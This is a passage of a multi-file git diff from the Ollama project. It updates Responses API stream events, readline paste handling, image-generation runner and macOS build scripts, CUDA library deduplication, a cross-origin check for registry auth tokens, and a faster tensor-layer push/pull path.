r["summary"] = nil
}
reasoning = r
}
// Build top_p and temperature with defaults
topP := 1.0
if c.request.TopP != nil {
topP = *c.request.TopP
}
temperature := 1.0
if c.request.Temperature != nil {
temperature = *c.request.Temperature
}
return map[string]any{
"id": c.responseID,
"object": "response",
"created_at": time.Now().Unix(),
"completed_at": nil,
"status": status,
"incomplete_details": nil,
"model": c.model,
"previous_response_id": nil,
"instructions": instructions,
"output": output,
"error": nil,
"tools": tools,
"tool_choice": "auto",
"truncation": truncation,
"parallel_tool_calls": true,
"text": map[string]any{"format": textFormat},
"top_p": topP,
"presence_penalty": 0,
"frequency_penalty": 0,
"top_logprobs": 0,
"temperature": temperature,
"reasoning": reasoning,
"usage": usage,
"max_output_tokens": c.request.MaxOutputTokens,
"max_tool_calls": nil,
"store": false,
"background": c.request.Background,
"service_tier": "default",
"metadata": map[string]any{},
"safety_identifier": nil,
"prompt_cache_key": nil,
}
}
func (c *ResponsesStreamConverter) createResponseCreatedEvent() ResponsesStreamEvent {
return c.newEvent("response.created", map[string]any{
"response": map[string]any{
"id": c.responseID,
"object": "response",
"status": "in_progress",
"output": []any{},
},
"response": c.buildResponseObject("in_progress", []any{}, nil),
})
}
func (c *ResponsesStreamConverter) createResponseInProgressEvent() ResponsesStreamEvent {
return c.newEvent("response.in_progress", map[string]any{
"response": map[string]any{
"id": c.responseID,
"object": "response",
"status": "in_progress",
"output": []any{},
},
"response": c.buildResponseObject("in_progress", []any{}, nil),
})
}
@@ -762,9 +995,10 @@ func (c *ResponsesStreamConverter) processThinking(thinking string) []ResponsesS
// Emit delta
events = append(events, c.newEvent("response.reasoning_summary_text.delta", map[string]any{
"item_id": c.reasoningItemID,
"output_index": c.outputIndex,
"delta": thinking,
"item_id": c.reasoningItemID,
"output_index": c.outputIndex,
"summary_index": 0,
"delta": thinking,
}))
// TODO(drifkin): consider adding
@@ -783,9 +1017,10 @@ func (c *ResponsesStreamConverter) finishReasoning() []ResponsesStreamEvent {
events := []ResponsesStreamEvent{
c.newEvent("response.reasoning_summary_text.done", map[string]any{
"item_id": c.reasoningItemID,
"output_index": c.outputIndex,
"text": c.accumulatedThinking,
"item_id": c.reasoningItemID,
"output_index": c.outputIndex,
"summary_index": 0,
"text": c.accumulatedThinking,
}),
c.newEvent("response.output_item.done", map[string]any{
"output_index": c.outputIndex,
@@ -898,8 +1133,10 @@ func (c *ResponsesStreamConverter) processTextContent(content string) []Response
"output_index": c.outputIndex,
"content_index": c.contentIndex,
"part": map[string]any{
"type": "output_text",
"text": "",
"type": "output_text",
"text": "",
"annotations": []any{},
"logprobs": []any{},
},
}))
}
@@ -913,6 +1150,7 @@ func (c *ResponsesStreamConverter) processTextContent(content string) []Response
"output_index": c.outputIndex,
"content_index": 0,
"delta": content,
"logprobs": []any{},
}))
return events
@@ -944,8 +1182,10 @@ func (c *ResponsesStreamConverter) buildFinalOutput() []any {
"status": "completed",
"role": "assistant",
"content": []map[string]any{{
"type": "output_text",
"text": c.accumulatedText,
"type": "output_text",
"text": c.accumulatedText,
"annotations": []any{},
"logprobs": []any{},
}},
})
}
@@ -967,6 +1207,7 @@ func (c *ResponsesStreamConverter) processCompletion(r api.ChatResponse) []Respo
"output_index": c.outputIndex,
"content_index": 0,
"text": c.accumulatedText,
"logprobs": []any{},
}))
// response.content_part.done
@@ -975,8 +1216,10 @@ func (c *ResponsesStreamConverter) processCompletion(r api.ChatResponse) []Respo
"output_index": c.outputIndex,
"content_index": 0,
"part": map[string]any{
"type": "output_text",
"text": c.accumulatedText,
"type": "output_text",
"text": c.accumulatedText,
"annotations": []any{},
"logprobs": []any{},
},
}))
@@ -989,26 +1232,31 @@ func (c *ResponsesStreamConverter) processCompletion(r api.ChatResponse) []Respo
"status": "completed",
"role": "assistant",
"content": []map[string]any{{
"type": "output_text",
"text": c.accumulatedText,
"type": "output_text",
"text": c.accumulatedText,
"annotations": []any{},
"logprobs": []any{},
}},
},
}))
}
// response.completed
events = append(events, c.newEvent("response.completed", map[string]any{
"response": map[string]any{
"id": c.responseID,
"object": "response",
"status": "completed",
"output": c.buildFinalOutput(),
"usage": map[string]any{
"input_tokens": r.PromptEvalCount,
"output_tokens": r.EvalCount,
"total_tokens": r.PromptEvalCount + r.EvalCount,
},
usage := map[string]any{
"input_tokens": r.PromptEvalCount,
"output_tokens": r.EvalCount,
"total_tokens": r.PromptEvalCount + r.EvalCount,
"input_tokens_details": map[string]any{
"cached_tokens": 0,
},
"output_tokens_details": map[string]any{
"reasoning_tokens": 0,
},
}
response := c.buildResponseObject("completed", c.buildFinalOutput(), usage)
response["completed_at"] = time.Now().Unix()
events = append(events, c.newEvent("response.completed", map[string]any{
"response": response,
}))
return events

View File

@@ -850,7 +850,7 @@ func TestFromResponsesRequest_Images(t *testing.T) {
}
func TestResponsesStreamConverter_TextOnly(t *testing.T) {
converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")
converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
// First chunk with content
events := converter.Process(api.ChatResponse{
@@ -916,7 +916,7 @@ func TestResponsesStreamConverter_TextOnly(t *testing.T) {
}
func TestResponsesStreamConverter_ToolCalls(t *testing.T) {
converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")
converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
events := converter.Process(api.ChatResponse{
Message: api.Message{
@@ -952,7 +952,7 @@ func TestResponsesStreamConverter_ToolCalls(t *testing.T) {
}
func TestResponsesStreamConverter_Reasoning(t *testing.T) {
converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")
converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
// First chunk with thinking
events := converter.Process(api.ChatResponse{
@@ -1267,7 +1267,7 @@ func TestToResponse_WithReasoning(t *testing.T) {
Content: "The answer is 42",
},
Done: true,
})
}, ResponsesRequest{})
// Should have 2 output items: reasoning + message
if len(response.Output) != 2 {
@@ -1638,7 +1638,7 @@ func TestFromResponsesRequest_ShorthandFormats(t *testing.T) {
func TestResponsesStreamConverter_OutputIncludesContent(t *testing.T) {
// Verify that response.output_item.done includes content field for messages
converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")
converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
// First chunk
converter.Process(api.ChatResponse{
@@ -1686,7 +1686,7 @@ func TestResponsesStreamConverter_OutputIncludesContent(t *testing.T) {
func TestResponsesStreamConverter_ResponseCompletedIncludesOutput(t *testing.T) {
// Verify that response.completed includes the output array
converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")
converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
// Process some content
converter.Process(api.ChatResponse{
@@ -1730,7 +1730,7 @@ func TestResponsesStreamConverter_ResponseCompletedIncludesOutput(t *testing.T)
func TestResponsesStreamConverter_ResponseCreatedIncludesOutput(t *testing.T) {
// Verify that response.created includes an empty output array
converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")
converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
events := converter.Process(api.ChatResponse{
Message: api.Message{Content: "Hi"},
@@ -1757,7 +1757,7 @@ func TestResponsesStreamConverter_ResponseCreatedIncludesOutput(t *testing.T) {
func TestResponsesStreamConverter_SequenceNumbers(t *testing.T) {
// Verify that events include incrementing sequence numbers
converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")
converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
events := converter.Process(api.ChatResponse{
Message: api.Message{Content: "Hello"},
@@ -1791,7 +1791,7 @@ func TestResponsesStreamConverter_SequenceNumbers(t *testing.T) {
func TestResponsesStreamConverter_FunctionCallStatus(t *testing.T) {
// Verify that function call items include status field
converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")
converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
events := converter.Process(api.ChatResponse{
Message: api.Message{

33
progress/stepbar.go Normal file
View File

@@ -0,0 +1,33 @@
package progress
import (
"fmt"
"strings"
)
// StepBar displays step-based progress (e.g., for image generation steps).
type StepBar struct {
message string
current int
total int
}
func NewStepBar(message string, total int) *StepBar {
return &StepBar{message: message, total: total}
}
func (s *StepBar) Set(current int) {
s.current = current
}
func (s *StepBar) String() string {
percent := float64(s.current) / float64(s.total) * 100
barWidth := s.total
empty := barWidth - s.current
// "Generating 0% ▕ ▏ 0/9"
return fmt.Sprintf("%s %3.0f%% ▕%s%s▏ %d/%d",
s.message, percent,
strings.Repeat("█", s.current), strings.Repeat(" ", empty),
s.current, s.total)
}

View File

@@ -5,6 +5,7 @@ import (
"fmt"
"io"
"os"
"strings"
)
type Prompt struct {
@@ -36,10 +37,11 @@ type Terminal struct {
}
type Instance struct {
Prompt *Prompt
Terminal *Terminal
History *History
Pasting bool
Prompt *Prompt
Terminal *Terminal
History *History
Pasting bool
pastedLines []string
}
func New(prompt Prompt) (*Instance, error) {
@@ -174,6 +176,8 @@ func (i *Instance) Readline() (string, error) {
case CharEsc:
esc = true
case CharInterrupt:
i.pastedLines = nil
i.Prompt.UseAlt = false
return "", ErrInterrupt
case CharPrev:
i.historyPrev(buf, &currentLineBuf)
@@ -188,7 +192,23 @@ func (i *Instance) Readline() (string, error) {
case CharForward:
buf.MoveRight()
case CharBackspace, CharCtrlH:
buf.Remove()
if buf.IsEmpty() && len(i.pastedLines) > 0 {
lastIdx := len(i.pastedLines) - 1
prevLine := i.pastedLines[lastIdx]
i.pastedLines = i.pastedLines[:lastIdx]
fmt.Print(CursorBOL + ClearToEOL + CursorUp + CursorBOL + ClearToEOL)
if len(i.pastedLines) == 0 {
fmt.Print(i.Prompt.Prompt)
i.Prompt.UseAlt = false
} else {
fmt.Print(i.Prompt.AltPrompt)
}
for _, r := range prevLine {
buf.Add(r)
}
} else {
buf.Remove()
}
case CharTab:
// todo: convert back to real tabs
for range 8 {
@@ -211,13 +231,28 @@ func (i *Instance) Readline() (string, error) {
case CharCtrlZ:
fd := os.Stdin.Fd()
return handleCharCtrlZ(fd, i.Terminal.termios)
case CharEnter, CharCtrlJ:
case CharCtrlJ:
i.pastedLines = append(i.pastedLines, buf.String())
buf.Buf.Clear()
buf.Pos = 0
buf.DisplayPos = 0
buf.LineHasSpace.Clear()
fmt.Println()
fmt.Print(i.Prompt.AltPrompt)
i.Prompt.UseAlt = true
continue
case CharEnter:
output := buf.String()
if len(i.pastedLines) > 0 {
output = strings.Join(i.pastedLines, "\n") + "\n" + output
i.pastedLines = nil
}
if output != "" {
i.History.Add(output)
}
buf.MoveToEnd()
fmt.Println()
i.Prompt.UseAlt = false
return output, nil
default:

View File

@@ -3,6 +3,7 @@ package runner
import (
"github.com/ollama/ollama/runner/llamarunner"
"github.com/ollama/ollama/runner/ollamarunner"
imagerunner "github.com/ollama/ollama/x/imagegen/runner"
)
func Execute(args []string) error {
@@ -11,12 +12,19 @@ func Execute(args []string) error {
}
var newRunner bool
if args[0] == "--ollama-engine" {
var imageRunner bool
if len(args) > 0 && args[0] == "--ollama-engine" {
args = args[1:]
newRunner = true
}
if len(args) > 0 && args[0] == "--image-engine" {
args = args[1:]
imageRunner = true
}
if newRunner {
if imageRunner {
return imagerunner.Execute(args)
} else if newRunner {
return ollamarunner.Execute(args)
} else {
return llamarunner.Execute(args)

View File

@@ -73,7 +73,7 @@ _build_darwin() {
MLX_CGO_CFLAGS="-O3 -I$(pwd)/$BUILD_DIR/_deps/mlx-c-src -mmacosx-version-min=14.0"
MLX_CGO_LDFLAGS="-L$(pwd)/$BUILD_DIR/lib/ollama -lmlxc -lmlx -Wl,-rpath,@executable_path -lc++ -framework Metal -framework Foundation -framework Accelerate -mmacosx-version-min=14.0"
fi
GOOS=darwin GOARCH=$ARCH CGO_ENABLED=1 CGO_CFLAGS="$MLX_CGO_CFLAGS" CGO_LDFLAGS="$MLX_CGO_LDFLAGS" go build -tags mlx -o $INSTALL_PREFIX/imagegen ./x/imagegen/cmd/engine
GOOS=darwin GOARCH=$ARCH CGO_ENABLED=1 CGO_CFLAGS="$MLX_CGO_CFLAGS" CGO_LDFLAGS="$MLX_CGO_LDFLAGS" go build -tags mlx -o $INSTALL_PREFIX/ollama-mlx .
GOOS=darwin GOARCH=$ARCH CGO_ENABLED=1 go build -o $INSTALL_PREFIX .
done
}
@@ -82,19 +82,19 @@ _sign_darwin() {
status "Creating universal binary..."
mkdir -p dist/darwin
lipo -create -output dist/darwin/ollama dist/darwin-*/ollama
lipo -create -output dist/darwin/imagegen dist/darwin-*/imagegen
lipo -create -output dist/darwin/ollama-mlx dist/darwin-*/ollama-mlx
chmod +x dist/darwin/ollama
chmod +x dist/darwin/imagegen
chmod +x dist/darwin/ollama-mlx
if [ -n "$APPLE_IDENTITY" ]; then
for F in dist/darwin/ollama dist/darwin-*/lib/ollama/* dist/darwin/imagegen; do
for F in dist/darwin/ollama dist/darwin-*/lib/ollama/* dist/darwin/ollama-mlx; do
codesign -f --timestamp -s "$APPLE_IDENTITY" --identifier ai.ollama.ollama --options=runtime $F
done
# create a temporary zip for notarization
TEMP=$(mktemp -u).zip
ditto -c -k --keepParent dist/darwin/ollama "$TEMP"
xcrun notarytool submit "$TEMP" --wait --timeout 10m --apple-id $APPLE_ID --password $APPLE_PASSWORD --team-id $APPLE_TEAM_ID
xcrun notarytool submit "$TEMP" --wait --timeout 20m --apple-id $APPLE_ID --password $APPLE_PASSWORD --team-id $APPLE_TEAM_ID
rm -f "$TEMP"
fi
@@ -154,38 +154,40 @@ _build_macapp() {
mkdir -p dist/Ollama.app/Contents/Resources
if [ -d dist/darwin-amd64 ]; then
lipo -create -output dist/Ollama.app/Contents/Resources/ollama dist/darwin-amd64/ollama dist/darwin-arm64/ollama
lipo -create -output dist/Ollama.app/Contents/Resources/imagegen dist/darwin-amd64/imagegen dist/darwin-arm64/imagegen
lipo -create -output dist/Ollama.app/Contents/Resources/ollama-mlx dist/darwin-amd64/ollama-mlx dist/darwin-arm64/ollama-mlx
for F in dist/darwin-amd64/lib/ollama/*mlx*.dylib ; do
lipo -create -output dist/darwin/$(basename $F) $F dist/darwin-arm64/lib/ollama/$(basename $F)
done
cp dist/darwin-*/lib/ollama/*.so dist/darwin-*/lib/ollama/*.dylib dist/Ollama.app/Contents/Resources/
cp dist/darwin/*.dylib dist/Ollama.app/Contents/Resources/
# Copy MLX metallib (architecture-independent, just use arm64 version)
cp dist/darwin-arm64/lib/ollama/*.metallib dist/Ollama.app/Contents/Resources/ 2>/dev/null || true
else
cp -a dist/darwin/ollama dist/Ollama.app/Contents/Resources/ollama
cp dist/darwin/*.so dist/darwin/*.dylib dist/Ollama.app/Contents/Resources/
fi
cp -a dist/darwin/imagegen dist/Ollama.app/Contents/Resources/imagegen
cp -a dist/darwin/ollama-mlx dist/Ollama.app/Contents/Resources/ollama-mlx
chmod a+x dist/Ollama.app/Contents/Resources/ollama
# Sign
if [ -n "$APPLE_IDENTITY" ]; then
codesign -f --timestamp -s "$APPLE_IDENTITY" --identifier ai.ollama.ollama --options=runtime dist/Ollama.app/Contents/Resources/ollama
for lib in dist/Ollama.app/Contents/Resources/*.so dist/Ollama.app/Contents/Resources/*.dylib dist/Ollama.app/Contents/Resources/imagegen ; do
for lib in dist/Ollama.app/Contents/Resources/*.so dist/Ollama.app/Contents/Resources/*.dylib dist/Ollama.app/Contents/Resources/*.metallib dist/Ollama.app/Contents/Resources/ollama-mlx ; do
codesign -f --timestamp -s "$APPLE_IDENTITY" --identifier ai.ollama.ollama --options=runtime ${lib}
done
codesign -f --timestamp -s "$APPLE_IDENTITY" --identifier com.electron.ollama --deep --options=runtime dist/Ollama.app
fi
rm -f dist/Ollama-darwin.zip
ditto -c -k --keepParent dist/Ollama.app dist/Ollama-darwin.zip
(cd dist/Ollama.app/Contents/Resources/; tar -cf - ollama imagegen *.so *.dylib) | gzip -9vc > dist/ollama-darwin.tgz
ditto -c -k --norsrc --keepParent dist/Ollama.app dist/Ollama-darwin.zip
(cd dist/Ollama.app/Contents/Resources/; tar -cf - ollama ollama-mlx *.so *.dylib *.metallib 2>/dev/null) | gzip -9vc > dist/ollama-darwin.tgz
# Notarize and Staple
if [ -n "$APPLE_IDENTITY" ]; then
$(xcrun -f notarytool) submit dist/Ollama-darwin.zip --wait --timeout 10m --apple-id "$APPLE_ID" --password "$APPLE_PASSWORD" --team-id "$APPLE_TEAM_ID"
$(xcrun -f notarytool) submit dist/Ollama-darwin.zip --wait --timeout 20m --apple-id "$APPLE_ID" --password "$APPLE_PASSWORD" --team-id "$APPLE_TEAM_ID"
rm -f dist/Ollama-darwin.zip
$(xcrun -f stapler) staple dist/Ollama.app
ditto -c -k --keepParent dist/Ollama.app dist/Ollama-darwin.zip
ditto -c -k --norsrc --keepParent dist/Ollama.app dist/Ollama-darwin.zip
rm -f dist/Ollama.dmg
@@ -206,7 +208,7 @@ _build_macapp() {
rm -f dist/rw*.dmg
codesign -f --timestamp -s "$APPLE_IDENTITY" --identifier ai.ollama.ollama --options=runtime dist/Ollama.dmg
$(xcrun -f notarytool) submit dist/Ollama.dmg --wait --timeout 10m --apple-id "$APPLE_ID" --password "$APPLE_PASSWORD" --team-id "$APPLE_TEAM_ID"
$(xcrun -f notarytool) submit dist/Ollama.dmg --wait --timeout 20m --apple-id "$APPLE_ID" --password "$APPLE_PASSWORD" --team-id "$APPLE_TEAM_ID"
$(xcrun -f stapler) staple dist/Ollama.dmg
else
echo "WARNING: Code signing disabled, this bundle will not work for upgrade testing"

View File

@@ -48,53 +48,12 @@ if echo $PLATFORM | grep "amd64" > /dev/null; then
.
fi
# Deduplicate CUDA libraries across mlx_* and cuda_* directories
deduplicate_cuda_libs() {
local base_dir="$1"
echo "Deduplicating CUDA libraries in ${base_dir}..."
# Find all mlx_cuda_* directories
for mlx_dir in "${base_dir}"/lib/ollama/mlx_cuda_*; do
[ -d "${mlx_dir}" ] || continue
# Extract CUDA version (e.g., v12, v13)
cuda_version=$(basename "${mlx_dir}" | sed 's/mlx_cuda_//')
cuda_dir="${base_dir}/lib/ollama/cuda_${cuda_version}"
# Skip if corresponding cuda_* directory doesn't exist
[ -d "${cuda_dir}" ] || continue
echo " Checking ${mlx_dir} against ${cuda_dir}..."
# Find all .so* files in mlx directory
find "${mlx_dir}" -type f -name "*.so*" | while read mlx_file; do
filename=$(basename "${mlx_file}")
cuda_file="${cuda_dir}/${filename}"
# Skip if file doesn't exist in cuda directory
[ -f "${cuda_file}" ] || continue
# Compare checksums
mlx_sum=$(sha256sum "${mlx_file}" | awk '{print $1}')
cuda_sum=$(sha256sum "${cuda_file}" | awk '{print $1}')
if [ "${mlx_sum}" = "${cuda_sum}" ]; then
echo " Deduplicating ${filename}"
# Calculate relative path from mlx_dir to cuda_dir
rel_path="../cuda_${cuda_version}/${filename}"
rm -f "${mlx_file}"
ln -s "${rel_path}" "${mlx_file}"
fi
done
done
}
# Run deduplication for each platform output directory
if echo $PLATFORM | grep "," > /dev/null ; then
deduplicate_cuda_libs "./dist/linux_amd64"
deduplicate_cuda_libs "./dist/linux_arm64"
$(dirname $0)/deduplicate_cuda_libs.sh "./dist/linux_amd64"
$(dirname $0)/deduplicate_cuda_libs.sh "./dist/linux_arm64"
elif echo $PLATFORM | grep "amd64\|arm64" > /dev/null ; then
deduplicate_cuda_libs "./dist"
$(dirname $0)/deduplicate_cuda_libs.sh "./dist"
fi
# buildx behavior changes for single vs. multiplatform

View File

@@ -0,0 +1,60 @@
#!/bin/sh
#
# Deduplicate CUDA libraries across mlx_* and cuda_* directories
# This script finds identical .so* files in mlx_cuda_* directories that exist
# in corresponding cuda_* directories and replaces them with symlinks.
#
set -eu
if [ $# -eq 0 ]; then
echo "ERROR: No directory specified" >&2
echo "Usage: $0 <base_directory>" >&2
exit 1
fi
base_dir="$1"
if [ ! -d "${base_dir}" ]; then
echo "ERROR: Directory ${base_dir} does not exist" >&2
exit 1
fi
echo "Deduplicating CUDA libraries in ${base_dir}..."
# Find all mlx_cuda_* directories
for mlx_dir in "${base_dir}"/lib/ollama/mlx_cuda_*; do
[ -d "${mlx_dir}" ] || continue
# Extract CUDA version (e.g., v12, v13)
cuda_version=$(basename "${mlx_dir}" | sed 's/mlx_cuda_//')
cuda_dir="${base_dir}/lib/ollama/cuda_${cuda_version}"
# Skip if corresponding cuda_* directory doesn't exist
[ -d "${cuda_dir}" ] || continue
echo " Checking ${mlx_dir} against ${cuda_dir}..."
# Find all .so* files in mlx directory
find "${mlx_dir}" -type f -name "*.so*" | while read mlx_file; do
filename=$(basename "${mlx_file}")
cuda_file="${cuda_dir}/${filename}"
# Skip if file doesn't exist in cuda directory
[ -f "${cuda_file}" ] || continue
# Compare checksums
mlx_sum=$(sha256sum "${mlx_file}" | awk '{print $1}')
cuda_sum=$(sha256sum "${cuda_file}" | awk '{print $1}')
if [ "${mlx_sum}" = "${cuda_sum}" ]; then
echo " Deduplicating ${filename}"
# Calculate relative path from mlx_dir to cuda_dir
rel_path="../cuda_${cuda_version}/${filename}"
rm -f "${mlx_file}"
ln -s "${rel_path}" "${mlx_file}"
fi
done
done
echo "Deduplication complete"

View File

@@ -50,12 +50,17 @@ func (r registryChallenge) URL() (*url.URL, error) {
return redirectURL, nil
}
func getAuthorizationToken(ctx context.Context, challenge registryChallenge) (string, error) {
func getAuthorizationToken(ctx context.Context, challenge registryChallenge, originalHost string) (string, error) {
redirectURL, err := challenge.URL()
if err != nil {
return "", err
}
// Validate that the realm host matches the original request host to prevent sending tokens cross-origin.
if redirectURL.Host != originalHost {
return "", fmt.Errorf("realm host %q does not match original host %q", redirectURL.Host, originalHost)
}
sha256sum := sha256.Sum256(nil)
data := []byte(fmt.Sprintf("%s,%s,%s", http.MethodGet, redirectURL.String(), base64.StdEncoding.EncodeToString([]byte(hex.EncodeToString(sha256sum[:])))))

113
server/auth_test.go Normal file
View File

@@ -0,0 +1,113 @@
package server
import (
"context"
"strings"
"testing"
"time"
)
func TestGetAuthorizationTokenRejectsCrossDomain(t *testing.T) {
tests := []struct {
realm string
originalHost string
wantMismatch bool
}{
{"https://example.com/token", "example.com", false},
{"https://example.com/token", "other.com", true},
{"https://example.com/token", "localhost:8000", true},
{"https://localhost:5000/token", "localhost:5000", false},
{"https://localhost:5000/token", "localhost:6000", true},
}
for _, tt := range tests {
t.Run(tt.originalHost, func(t *testing.T) {
ctx, cancel := context.WithTimeout(context.Background(), 100*time.Millisecond)
defer cancel()
challenge := registryChallenge{Realm: tt.realm, Service: "test", Scope: "repo:x:pull"}
_, err := getAuthorizationToken(ctx, challenge, tt.originalHost)
isMismatch := err != nil && strings.Contains(err.Error(), "does not match")
if tt.wantMismatch && !isMismatch {
t.Errorf("expected domain mismatch error, got: %v", err)
}
if !tt.wantMismatch && isMismatch {
t.Errorf("unexpected domain mismatch error: %v", err)
}
})
}
}
func TestParseRegistryChallenge(t *testing.T) {
tests := []struct {
input string
wantRealm, wantService, wantScope string
}{
{
`Bearer realm="https://auth.example.com/token",service="registry",scope="repo:foo:pull"`,
"https://auth.example.com/token", "registry", "repo:foo:pull",
},
{
`Bearer realm="https://r.ollama.ai/v2/token",service="ollama",scope="-"`,
"https://r.ollama.ai/v2/token", "ollama", "-",
},
{"", "", "", ""},
}
for _, tt := range tests {
result := parseRegistryChallenge(tt.input)
if result.Realm != tt.wantRealm || result.Service != tt.wantService || result.Scope != tt.wantScope {
t.Errorf("parseRegistryChallenge(%q) = {%q, %q, %q}, want {%q, %q, %q}",
tt.input, result.Realm, result.Service, result.Scope,
tt.wantRealm, tt.wantService, tt.wantScope)
}
}
}
func TestRegistryChallengeURL(t *testing.T) {
challenge := registryChallenge{
Realm: "https://auth.example.com/token",
Service: "registry",
Scope: "repo:foo:pull repo:bar:push",
}
u, err := challenge.URL()
if err != nil {
t.Fatalf("URL() error: %v", err)
}
if u.Host != "auth.example.com" {
t.Errorf("host = %q, want %q", u.Host, "auth.example.com")
}
if u.Path != "/token" {
t.Errorf("path = %q, want %q", u.Path, "/token")
}
q := u.Query()
if q.Get("service") != "registry" {
t.Errorf("service = %q, want %q", q.Get("service"), "registry")
}
if scopes := q["scope"]; len(scopes) != 2 {
t.Errorf("scope count = %d, want 2", len(scopes))
}
if q.Get("ts") == "" {
t.Error("missing ts")
}
if q.Get("nonce") == "" {
t.Error("missing nonce")
}
// Nonces should differ between calls
u2, _ := challenge.URL()
if q.Get("nonce") == u2.Query().Get("nonce") {
t.Error("nonce should be unique per call")
}
}
func TestRegistryChallengeURLInvalid(t *testing.T) {
challenge := registryChallenge{Realm: "://invalid"}
if _, err := challenge.URL(); err == nil {
t.Error("expected error for invalid URL")
}
}

View File

@@ -30,6 +30,7 @@ import (
"github.com/ollama/ollama/thinking"
"github.com/ollama/ollama/types/model"
"github.com/ollama/ollama/version"
"github.com/ollama/ollama/x/imagegen/transfer"
)
var (
@@ -73,6 +74,11 @@ type Model struct {
func (m *Model) Capabilities() []model.Capability {
capabilities := []model.Capability{}
// Check for image generation model via config capabilities
if slices.Contains(m.Config.Capabilities, "image") {
return []model.Capability{model.CapabilityImageGeneration}
}
// Check for completion capability
if m.ModelPath != "" {
f, err := gguf.Open(m.ModelPath)
@@ -555,6 +561,24 @@ func PushModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
layers = append(layers, manifest.Config)
}
// Use fast transfer for models with tensor layers (many small blobs)
if hasTensorLayers(layers) {
// Read raw manifest JSON to preserve tensor metadata fields
manifestPath, err := mp.GetManifestPath()
if err != nil {
return err
}
manifestJSON, err := os.ReadFile(manifestPath)
if err != nil {
return err
}
if err := pushWithTransfer(ctx, mp, layers, manifestJSON, regOpts, fn); err != nil {
return err
}
fn(api.ProgressResponse{Status: "success"})
return nil
}
for _, layer := range layers {
if err := uploadBlob(ctx, mp, layer, regOpts, fn); err != nil {
slog.Info(fmt.Sprintf("error uploading blob: %v", err))
@@ -620,6 +644,15 @@ func PullModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
layers = append(layers, manifest.Config)
}
// Use fast transfer for models with tensor layers (many small blobs)
if hasTensorLayers(layers) {
if err := pullWithTransfer(ctx, mp, layers, manifest, regOpts, fn); err != nil {
return err
}
fn(api.ProgressResponse{Status: "success"})
return nil
}
skipVerify := make(map[string]bool)
for _, layer := range layers {
cacheHit, err := downloadBlob(ctx, downloadOpts{
@@ -634,7 +667,6 @@ func PullModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
skipVerify[layer.Digest] = cacheHit
delete(deleteMap, layer.Digest)
}
delete(deleteMap, manifest.Config.Digest)
fn(api.ProgressResponse{Status: "verifying sha256 digest"})
for _, layer := range layers {
@@ -643,13 +675,11 @@ func PullModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
}
if err := verifyBlob(layer.Digest); err != nil {
if errors.Is(err, errDigestMismatch) {
// something went wrong, delete the blob
fp, err := GetBlobsPath(layer.Digest)
if err != nil {
return err
}
if err := os.Remove(fp); err != nil {
// log this, but return the original error
slog.Info(fmt.Sprintf("couldn't remove file with digest mismatch '%s': %v", fp, err))
}
}
@@ -657,6 +687,11 @@ func PullModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
}
}
for _, layer := range layers {
delete(deleteMap, layer.Digest)
}
delete(deleteMap, manifest.Config.Digest)
fn(api.ProgressResponse{Status: "writing manifest"})
manifestJSON, err := json.Marshal(manifest)
@@ -690,6 +725,148 @@ func PullModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
return nil
}
// hasTensorLayers checks if any layer has tensor media type.
func hasTensorLayers(layers []Layer) bool {
for _, layer := range layers {
if layer.MediaType == MediaTypeImageTensor {
return true
}
}
return false
}
// pullWithTransfer uses the simplified x/transfer package for downloading blobs.
func pullWithTransfer(ctx context.Context, mp ModelPath, layers []Layer, manifest *Manifest, regOpts *registryOptions, fn func(api.ProgressResponse)) error {
blobs := make([]transfer.Blob, len(layers))
for i, layer := range layers {
blobs[i] = transfer.Blob{
Digest: layer.Digest,
Size: layer.Size,
}
}
destDir, err := GetBlobsPath("")
if err != nil {
return err
}
base := mp.BaseURL()
if base.Scheme != "http" && regOpts != nil && regOpts.Insecure {
base.Scheme = "http"
}
baseURL := base.String()
var totalSize int64
for _, blob := range blobs {
totalSize += blob.Size
}
progress := func(completed, total int64) {
fn(api.ProgressResponse{
Status: "pulling model",
Digest: "sha256:model",
Total: total,
Completed: completed,
})
}
getToken := func(ctx context.Context, challenge transfer.AuthChallenge) (string, error) {
return getAuthorizationToken(ctx, registryChallenge{
Realm: challenge.Realm,
Service: challenge.Service,
Scope: challenge.Scope,
}, base.Host)
}
if err := transfer.Download(ctx, transfer.DownloadOptions{
Blobs: blobs,
BaseURL: baseURL,
DestDir: destDir,
Repository: mp.GetNamespaceRepository(),
Progress: progress,
Token: regOpts.Token,
GetToken: getToken,
Logger: slog.Default(),
}); err != nil {
return err
}
// Write manifest
fn(api.ProgressResponse{Status: "writing manifest"})
manifestJSON, err := json.Marshal(manifest)
if err != nil {
return err
}
fp, err := mp.GetManifestPath()
if err != nil {
return err
}
if err := os.MkdirAll(filepath.Dir(fp), 0o755); err != nil {
return err
}
return os.WriteFile(fp, manifestJSON, 0o644)
}
// pushWithTransfer uses the simplified x/transfer package for uploading blobs and manifest.
func pushWithTransfer(ctx context.Context, mp ModelPath, layers []Layer, manifestJSON []byte, regOpts *registryOptions, fn func(api.ProgressResponse)) error {
blobs := make([]transfer.Blob, len(layers))
for i, layer := range layers {
